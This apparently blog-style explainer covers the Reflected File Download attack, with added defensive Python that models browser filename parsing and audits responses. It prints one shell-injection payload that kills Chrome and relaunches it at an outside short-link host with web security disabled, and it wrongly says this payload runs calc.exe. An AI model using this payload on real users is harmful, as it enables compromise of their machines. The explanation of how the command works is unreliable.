It allows file downloads that appear to come from highly trusted domains such as Google.com and Bing.com without any file ever being uploaded to them. This is definitely something that we will probably see. The attack isn’t a JSON-specific attack, but JSON APIs are highly vulnerable.
Google has since implemented a fix, so the file now downloads as a harmless .txt file.
‘The URI specification defines the ability to send parameters in the path portion of the URI by inserting the semicolon character (before the query portion that starts with a question mark “?”).
If a web server accepts path parameters it does not really consider them to be a part of the path, which means we can inject any content, as it will be ignored. However, when it comes to determining the filename of a download, the vast majority of Web browsers (all browsers but Safari) parse and set a filename from path parameters.’
- Internet Explorer and Firefox – Parsing the filename from https://example.com/api;/setup.bat results in “setup.bat”. Success.
- Chrome and Opera – Parsing the filename from https://example.com/api;/setup.bat results in “api”. Everything after the semicolon is ignored. Well, not exactly: everything after the LAST semicolon is ignored. Parsing the filename from https://example.com/api;/setup.bat;ignored results in “setup.bat”. Success. So if we would like to support all of the above, it is possible to create a combination of (1) and (2):
- All browsers except Safari – Parsing the filename from https://example.com/api;/setup.bat;/setup.bat results in “setup.bat”. Success. Of course, application-specific URL parsing could lead to other characters being acceptable as separators in the path portion of the URL.
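The following is an added illustration, not code from the original post or from any browser: it models the filename-derivation rules the three bullets above describe (IE/Firefox take the last path segment as-is; Chrome/Opera first drop everything after the last semicolon) and turns them into a defender's check that reports, per browser family, whether the download name would come from client-supplied path data rather than from the endpoint itself. The endpoint path passed to the check is an assumption the caller supplies.

```python
from urllib.parse import urlsplit, unquote


def filename_ie_firefox(url: str) -> str:
    """IE/Firefox as described above: the last '/'-separated segment of the
    path, with path parameters (';...') treated like ordinary characters."""
    path = urlsplit(url).path
    return unquote(path.rsplit("/", 1)[-1])


def filename_chrome_opera(url: str) -> str:
    """Chrome/Opera as described above: everything after the LAST ';' is
    ignored, then the last '/'-separated segment of what remains is used."""
    path = urlsplit(url).path
    if ";" in path:
        path = path[: path.rfind(";")]
    return unquote(path.rsplit("/", 1)[-1])


# Model of the browser families the text distinguishes (Safari is omitted
# because the text says it does not parse a name from path parameters).
BROWSERS = {
    "ie_firefox": filename_ie_firefox,
    "chrome_opera": filename_chrome_opera,
}


def derived_filenames(url: str) -> dict:
    """Download name each modelled browser would derive when the response
    carries no Content-Disposition filename."""
    return {name: fn(url) for name, fn in BROWSERS.items()}


def client_controls_filename(url: str, endpoint: str) -> dict:
    """Defender's check. `endpoint` is the route the server actually serves
    (assumed known to the reviewer, e.g. "/api"); any derived name that is not
    the endpoint's own last segment was chosen by whoever built the URL, so the
    response must set an explicit Content-Disposition filename."""
    expected = endpoint.rstrip("/").rsplit("/", 1)[-1]
    return {b: name != expected for b, name in derived_filenames(url).items()}


if __name__ == "__main__":
    for u in ("https://example.com/api;/setup.bat",
              "https://example.com/api;/setup.bat;ignored",
              "https://example.com/api;/setup.bat;/setup.bat"):
        print(u, derived_filenames(u), client_controls_filename(u, "/api"))
```

Run against the three URLs from the text, the model reproduces the outcomes the bullets report: the first URL yields different names per browser, the last yields “setup.bat” everywhere, and the check flags both as client-controlled relative to the real `/api` route.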
For an RFD attack to be successful, there are three simple requirements:
- Reflected – some user input is being “reflected” to the response content. This is used to inject shell commands.
- Filename – the URL of the vulnerable site or API is permissive, and accepts additional input. This is often the case, and is used by attackers to set the extension of the file to an executable extension.
- Download – the response is being downloaded and a file is created “on-the-fly” by the Web browser. The browser then sets the filename.
Having the ability to control some of the content that is returned by the server in the response body is crucial for an RFD exploit to be successful. This is where the attack payload is inserted – the actual content or commands that inflict damage to the client’s machine. The usual sources of such reflected content are:
- Request Parameters
- Persistent Storage
- JSONP Callbacks
Content-Disposition Header Mistake
A common implementation error of the Content-Disposition header can result in Reflected File Download. Content-Disposition headers SHOULD include a “filename” parameter, to avoid having the browser parse the filename from the URL. This is the reason the Google APIs were vulnerable.
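As an added example (not code from the original post or from Google's APIs), here is a minimal JSONP-style handler written both ways: first with the mistake the paragraph describes, a forced download whose Content-Disposition names no file, so the browser derives name and extension from the URL; then hardened so that the reflected value is restricted to a JavaScript identifier, the header names the file explicitly, and the browser is told not to sniff the content type. The endpoint shape, the `callback` parameter and the fixed name `response.json` are assumptions.

```python
import json
import re

# A JSONP callback is a JavaScript identifier; anything else (spaces, quotes,
# pipes, semicolons) has no legitimate reason to be reflected into the body.
CALLBACK_OK = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}")


def vulnerable_jsonp(callback: str, data: dict) -> tuple[dict, str]:
    """The mistake: user input is reflected verbatim and the download is
    forced, but no filename is given, so the browser picks the name (and the
    extension, which decides how the OS runs the file) from the URL."""
    headers = {
        "Content-Type": "application/json",
        "Content-Disposition": "attachment",
    }
    body = f"{callback}({json.dumps(data)});"
    return headers, body


def hardened_jsonp(callback: str, data: dict) -> tuple[dict, str]:
    """Three independent fixes, each of which breaks one RFD requirement:
    (1) Reflected: the callback must be a plain identifier, so shell
        metacharacters never reach the response body;
    (2) Filename: Content-Disposition carries an explicit filename, so the
        browser never parses one out of path parameters;
    (3) Download: X-Content-Type-Options: nosniff keeps the browser from
        treating JSON as some other type it would hand to the OS."""
    if not CALLBACK_OK.fullmatch(callback):
        raise ValueError("callback must be a plain JavaScript identifier")
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "Content-Disposition": 'attachment; filename="response.json"',
        "X-Content-Type-Options": "nosniff",
    }
    body = f"{callback}({json.dumps(data)});"
    return headers, body


def has_filename(headers: dict) -> bool:
    """Review helper: does the Content-Disposition header name the file?"""
    return "filename=" in headers.get("Content-Disposition", "").lower()


if __name__ == "__main__":
    sample = {"q": "hello"}  # constructed request data
    for build in (vulnerable_jsonp, hardened_jsonp):
        h, b = build("cb", sample)
        print(build.__name__, has_filename(h), h["Content-Disposition"], b)
```

Of the three, the explicit filename is the one the text calls out and the one Google's fix applied; the callback validation and `nosniff` are defence in depth, since an endpoint that reflects other parameters into the body still needs the filename to be fixed server-side.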
RFD Attack Flow
RFD, like many other Web attacks, begins by sending a malicious link to a victim. But like no others, RFD ends outside of the browser context:
- The user follows a malicious link to a trusted Web site.
- An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was “hosted” on the trusted Web site.
- The user executes the file which contains shell commands that gain complete control over the computer.
Once you are able to break out of the quoted string in the batch file into shell context, you can inject commands to the OS.
The following would execute calc.exe on a Windows machine:
“||taskkill /F /IM ch*|md||start chrome pi.vu/B2jk –disable-web-security –disable-popup-blocking||
Burp Suite Analysis
A Google search query passes the user-specified term in the ‘q’ parameter; this is the parameter that is reflected back and used for the attack. ‘gs_ri’ (Google Search Request ID) – not fully sure about this parameter yet, but it is needed for the attack.
Google fixed this by adding Content-Disposition: attachment; filename=f.txt, so the file now downloads as a harmless .txt file.
Just as an example, I converted the .txt file to a .bat file to show how it would execute if Google didn’t have its protection in place.
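To tie the Burp analysis back to the three RFD requirements listed earlier (Reflected, Filename, Download), here is an added audit script, not part of the original post, that takes a request URL and a raw HTTP response of the kind copied out of Burp and reports which preconditions are present. The request and both responses are constructed samples: the `q` and `gs_ri` parameter names are the ones the text discusses, the fixed response carries exactly the `Content-Disposition: attachment; filename=f.txt` header the text says Google added, and `example.com` stands in for the real host.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample traffic for the demonstration (not captured from Google).
REQUEST_URL = "https://example.com/search;/report.txt?q=hello&gs_ri=constructed"

VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Content-Disposition: attachment\r\n"
    "\r\n"
    '{"query":"hello","results":[]}'
)

FIXED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Content-Disposition: attachment; filename=f.txt\r\n"
    "\r\n"
    '{"query":"hello","results":[]}'
)


def parse_response(raw: str) -> tuple[dict, str]:
    """Split a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def rfd_preconditions(request_url: str, raw_response: str) -> dict:
    """Check the three requirements from the text against one exchange.
    Reflected: a query parameter value reappears verbatim in the body.
    Filename: the download name is left for the browser to take from the URL
              (attachment with no filename); path parameters in the request
              show the URL accepts extra input at that position.
    Download: only the explicit 'attachment' case is checked here; a
              non-renderable Content-Type could also trigger a download."""
    headers, body = parse_response(raw_response)
    params = parse_qs(urlsplit(request_url).query)
    reflected = [k for k, vs in params.items() if any(v and v in body for v in vs)]
    disposition = headers.get("content-disposition", "").lower()
    forced_download = disposition.startswith("attachment")
    return {
        "reflected_params": reflected,
        "forced_download": forced_download,
        "filename_from_url": forced_download and "filename" not in disposition,
        "path_params_present": ";" in urlsplit(request_url).path,
    }


def is_rfd_candidate(report: dict) -> bool:
    """All three requirements hold: something is reflected, the download is
    forced, and the browser rather than the server chooses the filename."""
    return bool(report["reflected_params"]) and report["filename_from_url"]


if __name__ == "__main__":
    for label, raw in (("before fix", VULNERABLE_RESPONSE), ("after fix", FIXED_RESPONSE)):
        report = rfd_preconditions(REQUEST_URL, raw)
        print(label, report, "candidate:", is_rfd_candidate(report))
```

The same `q` value is reflected in both responses and the request path still carries a path parameter, so the only thing the fix changes is the filename: once the server names the file, the browser no longer derives the name or the extension from the URL, and the exchange stops being an RFD candidate.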